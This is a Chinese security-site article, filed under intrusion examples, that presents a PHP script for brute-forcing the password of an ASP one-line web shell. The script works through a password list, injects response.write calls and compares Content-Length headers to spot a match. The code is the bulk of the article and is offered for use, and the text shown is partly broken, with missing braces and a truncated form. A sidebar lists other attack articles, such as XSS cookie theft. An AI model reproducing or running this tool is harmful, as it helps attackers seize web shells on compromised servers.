暴力破解asp一句话[php版]

		当前位置：主页>安全文章>文章资料>入侵实例>文章内容

暴力破解asp一句话[php版]

来源：http://hi.baidu.com/wulinlw 作者：wulinlw 发布时间：2010-12-20

看到这里，http://www.t00ls.net/viewthread.php?tid=13764&extra=&page=1

就写了个php的，
说明：不是用获取页面内容，再判断关键字的方法。那样在一个大量数据的网页可能会很慢。
这里用的是判断http头的Content-Length的方法，如果密码匹配成功，则response.write就会成功，页面内容就比原来多了
思路就是这样！
php不能多线程，速度大概是1000个密码15-20秒

<?php

* Created on 2010-11-4

set_time_limit(0);

$url = $_GET['url'];

$passfile = $_GET['upfile'];

$keyword = "xxoo"; //关键字，改不改一样，因为判断的不是内容，而是http返回的内容长度

$c_l = get_headers($url,1); //获得正常http头的内容长度

$normal_c_l = $c_l['Content-Length'];

if($url && $passfile && $keyword) {

$fp = fopen($passfile,r);

while(!feof($fp)) {

$pass = trim(fgets($fp));

$all_url=$url."?".$pass."=response.write(".'"'.$keyword.'")';

$head_msg = get_headers($all_url,1);

if($head_msg['Content-Length'] >$normal_c_l) { //内容长度大于正常的就是keyword写入了，密码就出来咯

echo "<font color=red>破解成功，密码是：$pass</font>";

exit();

}

fclose($fp);

}

<html>

<head>

<title>asp一句话暴力破解</title>

</head>

<body>

<table>

<tr>

<td>一句话地址：</td>

</tr>

<tr>

</tr>

</table>

</form>

<p>说明：不是用获取页面内容，再判断关键字的方法。那样在一个大量数据的网页可能会很慢。</p>

<p>这里用的是判断http头的Content-Length的方法，如果密码匹配成功，则response.write就会成功，页面内容就比原来多了</p>

<p>思路就是这样！</p>

<p>php不能多线程，速度大概是1000个密码15-20秒</p>

<body>

</html>

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·另类网站入侵之一句话木马图片的
·0day批量拿站webshell，挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC

推荐广告